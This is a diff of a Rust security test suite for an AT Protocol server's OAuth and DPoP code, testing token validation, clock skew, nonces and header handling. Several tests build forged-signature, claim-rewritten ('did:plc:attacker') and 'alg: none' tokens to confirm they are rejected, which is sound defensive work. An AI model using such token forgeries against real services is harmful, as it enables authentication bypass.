- y: Some("DubR6_2kU1H5EYhbcNpYZGy1EY6GEKKxv6PYx8VW0rA".to_string()), 1057 - }; 1058 - let mut results = Vec::new(); 1059 - for _ in 0..100 { 1060 - results.push(compute_jwk_thumbprint(&jwk).unwrap()); 1061 - } 1062 - let first = &results[0]; 1063 - for (i, result) in results.iter().enumerate() { 1064 - assert_eq!( 1065 - first, result, 1066 - "Thumbprint should be deterministic, but iteration {} differs", 1067 - i 1068 - ); 1069 - } 1070 } 1071 1072 #[test] 1073 - fn test_security_dpop_iat_clock_skew_limits() { 1074 use p256::ecdsa::{Signature, SigningKey, signature::Signer}; 1075 use p256::elliptic_curve::sec1::ToEncodedPoint; 1076 let secret = b"test-dpop-secret-32-bytes-long!!"; 1077 let verifier = DPoPVerifier::new(secret); 1078 - let test_offsets = vec![ 1079 - (-600, true), 1080 - (-301, true), 1081 - (-299, false), 1082 - (0, false), 1083 - (299, false), 1084 - (301, true), 1085 - (600, true), 1086 - ]; 1087 - for (offset_secs, should_fail) in test_offsets { 1088 let signing_key = SigningKey::random(&mut rand::thread_rng()); 1089 - let verifying_key = signing_key.verifying_key(); 1090 - let point = verifying_key.to_encoded_point(false); 1091 let x = URL_SAFE_NO_PAD.encode(point.x().unwrap()); 1092 let y = URL_SAFE_NO_PAD.encode(point.y().unwrap()); 1093 - let header = json!({ 1094 - "typ": "dpop+jwt", 1095 - "alg": "ES256", 1096 - "jwk": { 1097 - "kty": "EC", 1098 - "crv": "P-256", 1099 - "x": x, 1100 - "y": y 1101 - } 1102 - }); 1103 - let payload = json!({ 1104 - "jti": format!("clock-{}-{}", offset_secs, Utc::now().timestamp_nanos_opt().unwrap_or(0)), 1105 - "htm": "POST", 1106 - "htu": "https://example.com/token", 1107 - "iat": Utc::now().timestamp() + offset_secs 1108 - }); 1109 let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap()); 1110 let payload_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()); 1111 let signing_input = format!("{}.{}", header_b64, payload_b64); 1112 let signature: Signature = signing_key.sign(signing_input.as_bytes()); 1113 - let signature_b64 = URL_SAFE_NO_PAD.encode(signature.to_bytes()); 1114 - let proof = format!("{}.{}.{}", header_b64, payload_b64, signature_b64); 1115 let result = verifier.verify_proof(&proof, "POST", "https://example.com/token", None); 1116 - if should_fail { 1117 - assert!( 1118 - result.is_err(), 1119 - "iat offset {} should be rejected", 1120 - offset_secs 1121 - ); 1122 - } else { 1123 - assert!( 1124 - result.is_ok(), 1125 - "iat offset {} should be accepted", 1126 - offset_secs 1127 - ); 1128 - } 1129 } 1130 } 1131 1132 #[test] 1133 - fn test_security_dpop_method_case_insensitivity() { 1134 use p256::ecdsa::{Signature, SigningKey, signature::Signer}; 1135 use p256::elliptic_curve::sec1::ToEncodedPoint; 1136 let secret = b"test-dpop-secret-32-bytes-long!!"; 1137 let verifier = DPoPVerifier::new(secret); 1138 let signing_key = SigningKey::random(&mut rand::thread_rng()); 1139 - let verifying_key = signing_key.verifying_key(); 1140 - let point = verifying_key.to_encoded_point(false); 1141 - let x = URL_SAFE_NO_PAD.encode(point.x().unwrap()); 1142 - let y = URL_SAFE_NO_PAD.encode(point.y().unwrap()); 1143 - let header = json!({ 1144 - "typ": "dpop+jwt", 1145 - "alg": "ES256", 1146 - "jwk": { 1147 - "kty": "EC", 1148 - "crv": "P-256", 1149 - "x": x, 1150 - "y": y 1151 - } 1152 - }); 1153 - let payload = json!({ 1154 - "jti": format!("case-{}", Utc::now().timestamp_nanos_opt().unwrap_or(0)), 1155 - "htm": "post", 1156 - "htu": "https://example.com/token", 1157 - "iat": Utc::now().timestamp() 1158 - }); 1159 - let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap()); 1160 - let payload_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()); 1161 - let signing_input = format!("{}.{}", header_b64, payload_b64); 1162 - let signature: Signature = signing_key.sign(signing_input.as_bytes()); 1163 - let signature_b64 = URL_SAFE_NO_PAD.encode(signature.to_bytes()); 1164 - let proof = format!("{}.{}.{}", header_b64, payload_b64, signature_b64); 1165 - let result = verifier.verify_proof(&proof, "POST", "https://example.com/token", None); 1166 - assert!( 1167 - result.is_ok(), 1168 - "HTTP method comparison should be case-insensitive" 1169 - ); 1170 - } 1171 - 1172 - #[tokio::test] 1173 - async fn test_security_invalid_grant_type_rejected() { 1174 - let url = base_url().await; 1175 - let http_client = client(); 1176 - let grant_types = vec![ 1177 - "client_credentials", 1178 - "password", 1179 - "implicit", 1180 - "urn:ietf:params:oauth:grant-type:jwt-bearer", 1181 - "urn:ietf:params:oauth:grant-type:device_code", 1182 - "", 1183 - "AUTHORIZATION_CODE", 1184 - "Authorization_Code", 1185 - ]; 1186 - for grant_type in grant_types { 1187 - let res = http_client 1188 - .post(format!("{}/oauth/token", url)) 1189 - .form(&[ 1190 - ("grant_type", grant_type), 1191 - ("client_id", "https://example.com"), 1192 - ]) 1193 - .send() 1194 - .await 1195 - .unwrap(); 1196 - assert_eq!( 1197 - res.status(), 1198 - StatusCode::BAD_REQUEST, 1199 - "Grant type '{}' should be rejected", 1200 - grant_type 1201 - ); 1202 - } 1203 - } 1204 - 1205 - #[tokio::test] 1206 - async fn test_security_token_with_wrong_typ_rejected() { 1207 - let url = base_url().await; 1208 - let http_client = client(); 1209 - let wrong_types = vec!["JWT", "jwt", "at+JWT", "access_token", ""]; 1210 - for typ in wrong_types { 1211 - let header = json!({ 1212 - "alg": "HS256", 1213 - "typ": typ 1214 - }); 1215 - let payload = json!({ 1216 - "iss": "https://test.pds", 1217 - "sub": "did:plc:test", 1218 - "aud": "https://test.pds", 1219 - "iat": Utc::now().timestamp(), 1220 - "exp": Utc::now().timestamp() + 3600, 1221 - "jti": "wrong-typ-token" 1222 - }); 1223 - let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap()); 1224 - let payload_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()); 1225 - let fake_sig = URL_SAFE_NO_PAD.encode(&[1u8; 32]); 1226 - let token = format!("{}.{}.{}", header_b64, payload_b64, fake_sig); 1227 - let res = http_client 1228 - .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 1229 - .header("Authorization", format!("Bearer {}", token)) 1230 - .send() 1231 - .await 1232 - .unwrap(); 1233 - assert_eq!( 1234 - res.status(), 1235 - StatusCode::UNAUTHORIZED, 1236 - "Token with typ='{}' should be rejected", 1237 - typ 1238 - ); 1239 - } 1240 - } 1241 - 1242 - #[tokio::test] 1243 - async fn test_security_missing_required_claims_rejected() { 1244 - let url = base_url().await; 1245 - let http_client = client(); 1246 - let tokens_missing_claims = vec![ 1247 - (json!({"iss": "x", "sub": "x", "aud": "x", "iat": 0}), "exp"), 1248 - ( 1249 - json!({"iss": "x", "sub": "x", "aud": "x", "exp": 9999999999i64}), 1250 - "iat", 1251 - ), 1252 - ( 1253 - json!({"iss": "x", "aud": "x", "iat": 0, "exp": 9999999999i64}), 1254 - "sub", 1255 - ), 1256 - ]; 1257 - for (payload, missing_claim) in tokens_missing_claims { 1258 - let header = json!({ 1259 - "alg": "HS256", 1260 - "typ": "at+jwt" 1261 - }); 1262 - let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap()); 1263 - let payload_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()); 1264 - let fake_sig = URL_SAFE_NO_PAD.encode(&[1u8; 32]); 1265 - let token = format!("{}.{}.{}", header_b64, payload_b64, fake_sig); 1266 - let res = http_client 1267 - .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 1268 - .header("Authorization", format!("Bearer {}", token)) 1269 - .send() 1270 - .await 1271 - .unwrap(); 1272 - assert_eq!( 1273 - res.status(), 1274 - StatusCode::UNAUTHORIZED, 1275 - "Token missing '{}' claim should be rejected", 1276 - missing_claim 1277 - ); 1278 - } 1279 - } 1280 - 1281 - #[tokio::test] 1282 - async fn test_security_malformed_tokens_rejected() { 1283 - let url = base_url().await; 1284 - let http_client = client(); 1285 - let malformed_tokens = vec![ 1286 - "", 1287 - "not-a-token", 1288 - "one.two", 1289 - "one.two.three.four", 1290 - "....", 1291 - "eyJhbGciOiJIUzI1NiJ9", 1292 - "eyJhbGciOiJIUzI1NiJ9.", 1293 - "eyJhbGciOiJIUzI1NiJ9..", 1294 - ".eyJzdWIiOiJ0ZXN0In0.", 1295 - "!!invalid-base64!!.eyJzdWIiOiJ0ZXN0In0.sig", 1296 - "eyJhbGciOiJIUzI1NiJ9.!!invalid!!.sig", 1297 - ]; 1298 - for token in malformed_tokens { 1299 - let res = http_client 1300 - .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 1301 - .header("Authorization", format!("Bearer {}", token)) 1302 - .send() 1303 - .await 1304 - .unwrap(); 1305 - assert_eq!( 1306 - res.status(), 1307 - StatusCode::UNAUTHORIZED, 1308 - "Malformed token '{}' should be rejected", 1309 - if token.len() > 50 { 1310 - &token[..50] 1311 - } else { 1312 - token 1313 - } 1314 - ); 1315 - } 1316 - } 1317 - 1318 - #[tokio::test] 1319 - async fn test_security_authorization_header_formats() { 1320 - let url = base_url().await; 1321 - let http_client = client(); 1322 - let (access_token, _, _) = get_oauth_tokens(&http_client, url).await; 1323 - let valid_case_variants = vec![ 1324 - format!("bearer {}", access_token), 1325 - format!("BEARER {}", access_token), 1326 - format!("Bearer {}", access_token), 1327 - ]; 1328 - for auth_header in valid_case_variants { 1329 - let res = http_client 1330 - .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 1331 - .header("Authorization", &auth_header) 1332 - .send() 1333 - .await 1334 - .unwrap(); 1335 - assert_eq!( 1336 - res.status(), 1337 - StatusCode::OK, 1338 - "Auth header '{}...' should be accepted (RFC 7235 case-insensitivity)", 1339 - if auth_header.len() > 30 { 1340 - &auth_header[..30] 1341 - } else { 1342 - &auth_header 1343 - } 1344 - ); 1345 - } 1346 - let invalid_formats = vec![ 1347 - format!("Basic {}", access_token), 1348 - format!("Digest {}", access_token), 1349 - access_token.clone(), 1350 - format!("Bearer{}", access_token), 1351 - ]; 1352 - for auth_header in invalid_formats { 1353 - let res = http_client 1354 - .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 1355 - .header("Authorization", &auth_header) 1356 - .send() 1357 - .await 1358 - .unwrap(); 1359 - assert_eq!( 1360 - res.status(), 1361 - StatusCode::UNAUTHORIZED, 1362 - "Auth header '{}...' should be rejected", 1363 - if auth_header.len() > 30 { 1364 - &auth_header[..30] 1365 - } else { 1366 - &auth_header 1367 - } 1368 - ); 1369 - } 1370 - } 1371 - 1372 - #[tokio::test] 1373 - async fn test_security_no_authorization_header() { 1374 - let url = base_url().await; 1375 - let http_client = client(); 1376 - let res = http_client 1377 - .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 1378 - .send() 1379 - .await 1380 - .unwrap(); 1381 - assert_eq!( 1382 - res.status(), 1383 - StatusCode::UNAUTHORIZED, 1384 - "Missing auth header should return 401" 1385 - ); 1386 - } 1387 - 1388 - #[tokio::test] 1389 - async fn test_security_empty_authorization_header() { 1390 - let url = base_url().await; 1391 - let http_client = client(); 1392 - let res = http_client 1393 - .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 1394 - .header("Authorization", "") 1395 - .send() 1396 - .await 1397 - .unwrap(); 1398 - assert_eq!( 1399 - res.status(), 1400 - StatusCode::UNAUTHORIZED, 1401 - "Empty auth header should return 401" 1402 - ); 1403 - } 1404 - 1405 - #[tokio::test] 1406 - async fn test_security_revoked_token_rejected() { 1407 - let url = base_url().await; 1408 - let http_client = client(); 1409 - let (access_token, refresh_token, _) = get_oauth_tokens(&http_client, url).await; 1410 - let revoke_res = http_client 1411 - .post(format!("{}/oauth/revoke", url)) 1412 - .form(&[("token", &refresh_token)]) 1413 - .send() 1414 - .await 1415 - .unwrap(); 1416 - assert_eq!(revoke_res.status(), StatusCode::OK); 1417 - let introspect_res = http_client 1418 - .post(format!("{}/oauth/introspect", url)) 1419 - .form(&[("token", &access_token)]) 1420 - .send() 1421 - .await 1422 - .unwrap(); 1423 - let introspect_body: Value = introspect_res.json().await.unwrap(); 1424 - assert_eq!( 1425 - introspect_body["active"], false, 1426 - "Revoked token should be inactive" 1427 - ); 1428 - } 1429 - 1430 - #[tokio::test] 1431 - #[ignore = "rate limiting is disabled in test environment"] 1432 - async fn test_security_oauth_authorize_rate_limiting() { 1433 - let url = base_url().await; 1434 - let http_client = no_redirect_client(); 1435 - let ts = Utc::now().timestamp_nanos_opt().unwrap_or(0); 1436 - let unique_ip = format!( 1437 - "10.{}.{}.{}", 1438 - (ts >> 16) & 0xFF, 1439 - (ts >> 8) & 0xFF, 1440 - ts & 0xFF 1441 - ); 1442 - let redirect_uri = "https://example.com/rate-limit-callback"; 1443 - let mock_client = setup_mock_client_metadata(redirect_uri).await; 1444 - let client_id = mock_client.uri(); 1445 - let (_, code_challenge) = generate_pkce(); 1446 - let client_for_par = client(); 1447 - let par_body: Value = client_for_par 1448 - .post(format!("{}/oauth/par", url)) 1449 - .form(&[ 1450 - ("response_type", "code"), 1451 - ("client_id", &client_id), 1452 - ("redirect_uri", redirect_uri), 1453 - ("code_challenge", &code_challenge), 1454 - ("code_challenge_method", "S256"), 1455 - ]) 1456 - .send() 1457 - .await 1458 - .unwrap() 1459 - .json() 1460 - .await 1461 - .unwrap(); 1462 - let request_uri = par_body["request_uri"].as_str().unwrap(); 1463 - let mut rate_limited_count = 0; 1464 - let mut other_count = 0; 1465 - for _ in 0..15 { 1466 - let res = http_client 1467 - .post(format!("{}/oauth/authorize", url)) 1468 - .header("X-Forwarded-For", &unique_ip) 1469 - .form(&[ 1470 - ("request_uri", request_uri), 1471 - ("username", "nonexistent_user"), 1472 - ("password", "wrong_password"), 1473 - ("remember_device", "false"), 1474 - ]) 1475 - .send() 1476 - .await 1477 - .unwrap(); 1478 - match res.status() { 1479 - StatusCode::TOO_MANY_REQUESTS => rate_limited_count += 1, 1480 - _ => other_count += 1, 1481 - } 1482 - } 1483 - assert!( 1484 - rate_limited_count > 0, 1485 - "Expected at least one rate-limited response after 15 OAuth authorize attempts. Got {} other and {} rate limited.", 1486 - other_count, 1487 - rate_limited_count 1488 - ); 1489 - } 1490 - 1491 - fn create_dpop_proof( 1492 - method: &str, 1493 - uri: &str, 1494 - nonce: Option<&str>, 1495 - ath: Option<&str>, 1496 - iat_offset_secs: i64, 1497 - ) -> String { 1498 - use p256::ecdsa::{Signature, SigningKey, signature::Signer}; 1499 - let signing_key = SigningKey::random(&mut rand::thread_rng()); 1500 - let verifying_key = signing_key.verifying_key(); 1501 - let point = verifying_key.to_encoded_point(false); 1502 let x = URL_SAFE_NO_PAD.encode(point.x().unwrap()); 1503 let y = URL_SAFE_NO_PAD.encode(point.y().unwrap()); 1504 - let jwk = json!({ 1505 - "kty": "EC", 1506 - "crv": "P-256", 1507 - "x": x, 1508 - "y": y 1509 - }); 1510 - let header = json!({ 1511 - "typ": "dpop+jwt", 1512 - "alg": "ES256", 1513 - "jwk": jwk 1514 - }); 1515 - let mut payload = json!({ 1516 - "jti": format!("unique-{}", Utc::now().timestamp_nanos_opt().unwrap_or(0)), 1517 - "htm": method, 1518 - "htu": uri, 1519 - "iat": Utc::now().timestamp() + iat_offset_secs 1520 - }); 1521 - if let Some(n) = nonce { 1522 - payload["nonce"] = json!(n); 1523 - } 1524 - if let Some(a) = ath { 1525 - payload["ath"] = json!(a); 1526 - } 1527 let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap()); 1528 let payload_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()); 1529 let signing_input = format!("{}.{}", header_b64, payload_b64); 1530 let signature: Signature = signing_key.sign(signing_input.as_bytes()); 1531 - let signature_b64 = URL_SAFE_NO_PAD.encode(signature.to_bytes()); 1532 - format!("{}.{}", signing_input, signature_b64) 1533 - } 1534 - 1535 - #[test] 1536 - fn test_dpop_nonce_generation() { 1537 - let secret = b"test-dpop-secret-32-bytes-long!!"; 1538 - let verifier = DPoPVerifier::new(secret); 1539 - let nonce1 = verifier.generate_nonce(); 1540 - let nonce2 = verifier.generate_nonce(); 1541 - assert!(!nonce1.is_empty()); 1542 - assert!(!nonce2.is_empty()); 1543 - } 1544 - 1545 - #[test] 1546 - fn test_dpop_nonce_validation_success() { 1547 - let secret = b"test-dpop-secret-32-bytes-long!!"; 1548 - let verifier = DPoPVerifier::new(secret); 1549 - let nonce = verifier.generate_nonce(); 1550 - let result = verifier.validate_nonce(&nonce); 1551 - assert!(result.is_ok(), "Valid nonce should pass: {:?}", result); 1552 - } 1553 - 1554 - #[test] 1555 - fn test_dpop_nonce_wrong_secret() { 1556 - let secret1 = b"test-dpop-secret-32-bytes-long!!"; 1557 - let secret2 = b"different-secret-32-bytes-long!!"; 1558 - let verifier1 = DPoPVerifier::new(secret1); 1559 - let verifier2 = DPoPVerifier::new(secret2); 1560 - let nonce = verifier1.generate_nonce(); 1561 - let result = verifier2.validate_nonce(&nonce); 1562 - assert!(result.is_err(), "Nonce from different secret should fail"); 1563 - } 1564 - 1565 - #[test] 1566 - fn test_dpop_nonce_invalid_format() { 1567 - let secret = b"test-dpop-secret-32-bytes-long!!"; 1568 - let verifier = DPoPVerifier::new(secret); 1569 - assert!(verifier.validate_nonce("invalid").is_err()); 1570 - assert!(verifier.validate_nonce("").is_err()); 1571 - assert!(verifier.validate_nonce("!!!not-base64!!!").is_err()); 1572 - } 1573 - 1574 - #[test] 1575 - fn test_jwk_thumbprint_ec_p256() { 1576 - let jwk = DPoPJwk { 1577 - kty: "EC".to_string(), 1578 - crv: Some("P-256".to_string()), 1579 - x: Some("WbbXrPhtCg66wuF0NLhzXxF5PFzNZ7wNJm9M_1pCcXY".to_string()), 1580 - y: Some("DubR6_2kU1H5EYhbcNpYZGy1EY6GEKKxv6PYx8VW0rA".to_string()), 1581 - }; 1582 - let thumbprint = compute_jwk_thumbprint(&jwk); 1583 - assert!(thumbprint.is_ok()); 1584 - let tp = thumbprint.unwrap(); 1585 - assert!(!tp.is_empty()); 1586 - assert!( 1587 - tp.chars() 1588 - .all(|c| c.is_alphanumeric() || c == '-' || c == '_') 1589 - ); 1590 - } 1591 - 1592 - #[test] 1593 - fn test_jwk_thumbprint_ec_secp256k1() { 1594 - let jwk = DPoPJwk { 1595 - kty: "EC".to_string(), 1596 - crv: Some("secp256k1".to_string()), 1597 - x: Some("some_x_value".to_string()), 1598 - y: Some("some_y_value".to_string()), 1599 - }; 1600 - let thumbprint = compute_jwk_thumbprint(&jwk); 1601 - assert!(thumbprint.is_ok()); 1602 - } 1603 - 1604 - #[test] 1605 - fn test_jwk_thumbprint_okp_ed25519() { 1606 - let jwk = DPoPJwk { 1607 - kty: "OKP".to_string(), 1608 - crv: Some("Ed25519".to_string()), 1609 - x: Some("some_x_value".to_string()), 1610 - y: None, 1611 - }; 1612 - let thumbprint = compute_jwk_thumbprint(&jwk); 1613 - assert!(thumbprint.is_ok()); 1614 - } 1615 - 1616 - #[test] 1617 - fn test_jwk_thumbprint_missing_crv() { 1618 - let jwk = DPoPJwk { 1619 - kty: "EC".to_string(), 1620 - crv: None, 1621 - x: Some("x".to_string()), 1622 - y: Some("y".to_string()), 1623 - }; 1624 - let thumbprint = compute_jwk_thumbprint(&jwk); 1625 - assert!(thumbprint.is_err()); 1626 - } 1627 - 1628 - #[test] 1629 - fn test_jwk_thumbprint_missing_x() { 1630 - let jwk = DPoPJwk { 1631 - kty: "EC".to_string(), 1632 - crv: Some("P-256".to_string()), 1633 - x: None, 1634 - y: Some("y".to_string()), 1635 - }; 1636 - let thumbprint = compute_jwk_thumbprint(&jwk); 1637 - assert!(thumbprint.is_err()); 1638 - } 1639 - 1640 - #[test] 1641 - fn test_jwk_thumbprint_missing_y_for_ec() { 1642 - let jwk = DPoPJwk { 1643 - kty: "EC".to_string(), 1644 - crv: Some("P-256".to_string()), 1645 - x: Some("x".to_string()), 1646 - y: None, 1647 - }; 1648 - let thumbprint = compute_jwk_thumbprint(&jwk); 1649 - assert!(thumbprint.is_err()); 1650 - } 1651 - 1652 - #[test] 1653 - fn test_jwk_thumbprint_unsupported_key_type() { 1654 - let jwk = DPoPJwk { 1655 - kty: "RSA".to_string(), 1656 - crv: None, 1657 - x: None, 1658 - y: None, 1659 - }; 1660 - let thumbprint = compute_jwk_thumbprint(&jwk); 1661 - assert!(thumbprint.is_err()); 1662 - } 1663 - 1664 - #[test] 1665 - fn test_jwk_thumbprint_deterministic() { 1666 - let jwk = DPoPJwk { 1667 - kty: "EC".to_string(), 1668 - crv: Some("P-256".to_string()), 1669 - x: Some("WbbXrPhtCg66wuF0NLhzXxF5PFzNZ7wNJm9M_1pCcXY".to_string()), 1670 - y: Some("DubR6_2kU1H5EYhbcNpYZGy1EY6GEKKxv6PYx8VW0rA".to_string()), 1671 - }; 1672 - let tp1 = compute_jwk_thumbprint(&jwk).unwrap(); 1673 - let tp2 = compute_jwk_thumbprint(&jwk).unwrap(); 1674 - assert_eq!(tp1, tp2, "Thumbprint should be deterministic"); 1675 - } 1676 - 1677 - #[test] 1678 - fn test_dpop_proof_invalid_format() { 1679 - let secret = b"test-dpop-secret-32-bytes-long!!"; 1680 - let verifier = DPoPVerifier::new(secret); 1681 - let result = verifier.verify_proof("not.enough.parts", "POST", "https://example.com", None); 1682 - assert!(result.is_err()); 1683 - let result = verifier.verify_proof("invalid", "POST", "https://example.com", None); 1684 - assert!(result.is_err()); 1685 - } 1686 - 1687 - #[test] 1688 - fn test_dpop_proof_invalid_typ() { 1689 - let secret = b"test-dpop-secret-32-bytes-long!!"; 1690 - let verifier = DPoPVerifier::new(secret); 1691 - let header = json!({ 1692 - "typ": "JWT", 1693 - "alg": "ES256", 1694 - "jwk": { 1695 - "kty": "EC", 1696 - "crv": "P-256", 1697 - "x": "x", 1698 - "y": "y" 1699 - } 1700 - }); 1701 - let payload = json!({ 1702 - "jti": "unique", 1703 - "htm": "POST", 1704 - "htu": "https://example.com", 1705 - "iat": Utc::now().timestamp() 1706 - }); 1707 - let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap()); 1708 - let payload_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()); 1709 - let proof = format!("{}.{}.sig", header_b64, payload_b64); 1710 - let result = verifier.verify_proof(&proof, "POST", "https://example.com", None); 1711 - assert!(result.is_err()); 1712 - } 1713 - 1714 - #[test] 1715 - fn test_dpop_proof_method_mismatch() { 1716 - let secret = b"test-dpop-secret-32-bytes-long!!"; 1717 - let verifier = DPoPVerifier::new(secret); 1718 - let proof = create_dpop_proof("POST", "https://example.com/token", None, None, 0); 1719 - let result = verifier.verify_proof(&proof, "GET", "https://example.com/token", None); 1720 - assert!(result.is_err()); 1721 - } 1722 - 1723 - #[test] 1724 - fn test_dpop_proof_uri_mismatch() { 1725 - let secret = b"test-dpop-secret-32-bytes-long!!"; 1726 - let verifier = DPoPVerifier::new(secret); 1727 - let proof = create_dpop_proof("POST", "https://example.com/token", None, None, 0); 1728 - let result = verifier.verify_proof(&proof, "POST", "https://other.com/token", None); 1729 - assert!(result.is_err()); 1730 - } 1731 - 1732 - #[test] 1733 - fn test_dpop_proof_iat_too_old() { 1734 - let secret = b"test-dpop-secret-32-bytes-long!!"; 1735 - let verifier = DPoPVerifier::new(secret); 1736 - let proof = create_dpop_proof("POST", "https://example.com/token", None, None, -600); 1737 - let result = verifier.verify_proof(&proof, "POST", "https://example.com/token", None); 1738 - assert!(result.is_err()); 1739 - } 1740 - 1741 - #[test] 1742 - fn test_dpop_proof_iat_future() { 1743 - let secret = b"test-dpop-secret-32-bytes-long!!"; 1744 - let verifier = DPoPVerifier::new(secret); 1745 - let proof = create_dpop_proof("POST", "https://example.com/token", None, None, 600); 1746 - let result = verifier.verify_proof(&proof, "POST", "https://example.com/token", None); 1747 - assert!(result.is_err()); 1748 - } 1749 - 1750 - #[test] 1751 - fn test_dpop_proof_ath_mismatch() { 1752 - let secret = b"test-dpop-secret-32-bytes-long!!"; 1753 - let verifier = DPoPVerifier::new(secret); 1754 - let proof = create_dpop_proof( 1755 - "GET", 1756 - "https://example.com/resource", 1757 - None, 1758 - Some("wrong_hash"), 1759 - 0, 1760 - ); 1761 - let result = verifier.verify_proof( 1762 - &proof, 1763 - "GET", 1764 - "https://example.com/resource", 1765 - Some("correct_hash"), 1766 - ); 1767 - assert!(result.is_err()); 1768 - } 1769 - 1770 - #[test] 1771 - fn test_dpop_proof_missing_ath_when_required() { 1772 - let secret = b"test-dpop-secret-32-bytes-long!!"; 1773 - let verifier = DPoPVerifier::new(secret); 1774 - let proof = create_dpop_proof("GET", "https://example.com/resource", None, None, 0); 1775 - let result = verifier.verify_proof( 1776 - &proof, 1777 - "GET", 1778 - "https://example.com/resource", 1779 - Some("expected_hash"), 1780 - ); 1781 - assert!(result.is_err()); 1782 - } 1783 - 1784 - #[test] 1785 - fn test_dpop_proof_uri_ignores_query_params() { 1786 - let secret = b"test-dpop-secret-32-bytes-long!!"; 1787 - let verifier = DPoPVerifier::new(secret); 1788 - let proof = create_dpop_proof("POST", "https://example.com/token", None, None, 0); 1789 - let result = verifier.verify_proof(&proof, "POST", "https://example.com/token?foo=bar", None); 1790 - assert!( 1791 - result.is_ok(), 1792 - "Query params should be ignored: {:?}", 1793 - result 1794 - ); 1795 }
··· 1 #![allow(unused_imports)] 2 mod common; 3 mod helpers; 4 use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD}; ··· 13 use wiremock::{Mock, MockServer, ResponseTemplate}; 14 15 fn no_redirect_client() -> reqwest::Client { 16 + reqwest::Client::builder().redirect(redirect::Policy::none()).build().unwrap() 17 } 18 19 fn generate_pkce() -> (String, String) { ··· 21 let code_verifier = URL_SAFE_NO_PAD.encode(verifier_bytes); 22 let mut hasher = Sha256::new(); 23 hasher.update(code_verifier.as_bytes()); 24 + let code_challenge = URL_SAFE_NO_PAD.encode(&hasher.finalize()); 25 (code_verifier, code_challenge) 26 } 27 28 async fn setup_mock_client_metadata(redirect_uri: &str) -> MockServer { 29 let mock_server = MockServer::start().await; 30 let metadata = json!({ 31 + "client_id": mock_server.uri(), 32 "client_name": "Security Test Client", 33 "redirect_uris": [redirect_uri], 34 "grant_types": ["authorization_code", "refresh_token"], ··· 36 "token_endpoint_auth_method": "none", 37 "dpop_bound_access_tokens": false 38 }); 39 + Mock::given(method("GET")).and(path("/")) 40 .respond_with(ResponseTemplate::new(200).set_body_json(metadata)) 41 + .mount(&mock_server).await; 42 mock_server 43 } 44 45 async fn get_oauth_tokens(http_client: &reqwest::Client, url: &str) -> (String, String, String) { 46 let ts = Utc::now().timestamp_millis(); 47 let handle = format!("sec-test-{}", ts); 48 + http_client.post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 49 + .json(&json!({ "handle": handle, "email": format!("{}@example.com", handle), "password": "security-test-password" })) 50 + .send().await.unwrap(); 51 let redirect_uri = "https://example.com/sec-callback"; 52 let mock_client = setup_mock_client_metadata(redirect_uri).await; 53 let client_id = mock_client.uri(); 54 let (code_verifier, code_challenge) = generate_pkce(); 55 + let par_body: Value = http_client.post(format!("{}/oauth/par", url)) 56 + .form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri), 57 + ("code_challenge", &code_challenge), ("code_challenge_method", "S256")]) 58 + .send().await.unwrap().json().await.unwrap(); 59 let request_uri = par_body["request_uri"].as_str().unwrap(); 60 let auth_client = no_redirect_client(); 61 + let auth_res = auth_client.post(format!("{}/oauth/authorize", url)) 62 + .form(&[("request_uri", request_uri), ("username", &handle), ("password", "security-test-password"), ("remember_device", "false")]) 63 + .send().await.unwrap(); 64 + let location = auth_res.headers().get("location").unwrap().to_str().unwrap(); 65 + let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap(); 66 + let token_body: Value = http_client.post(format!("{}/oauth/token", url)) 67 + .form(&[("grant_type", "authorization_code"), ("code", code), ("redirect_uri", redirect_uri), 68 + ("code_verifier", &code_verifier), ("client_id", &client_id)]) 69 + .send().await.unwrap().json().await.unwrap(); 70 + (token_body["access_token"].as_str().unwrap().to_string(), 71 + token_body["refresh_token"].as_str().unwrap().to_string(), client_id) 72 } 73 74 #[tokio::test] 75 + async fn test_token_tampering_attacks() { 76 let url = base_url().await; 77 let http_client = client(); 78 let (access_token, _, _) = get_oauth_tokens(&http_client, url).await; 79 let parts: Vec<&str> = access_token.split('.').collect(); 80 + assert_eq!(parts.len(), 3); 81 + let forged_sig = URL_SAFE_NO_PAD.encode(&[0u8; 32]); 82 + let forged_token = format!("{}.{}.{}", parts[0], parts[1], forged_sig); 83 + assert_eq!(http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 84 + .bearer_auth(&forged_token).send().await.unwrap().status(), StatusCode::UNAUTHORIZED, "Forged signature should be rejected"); 85 let payload_bytes = URL_SAFE_NO_PAD.decode(parts[1]).unwrap(); 86 let mut payload: Value = serde_json::from_slice(&payload_bytes).unwrap(); 87 payload["sub"] = json!("did:plc:attacker"); 88 let modified_payload = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()); 89 let modified_token = format!("{}.{}.{}", parts[0], modified_payload, parts[2]); 90 + assert_eq!(http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 91 + .bearer_auth(&modified_token).send().await.unwrap().status(), StatusCode::UNAUTHORIZED, "Modified payload should be rejected"); 92 + let none_header = json!({ "alg": "none", "typ": "at+jwt" }); 93 + let none_payload = json!({ "iss": "https://test.pds", "sub": 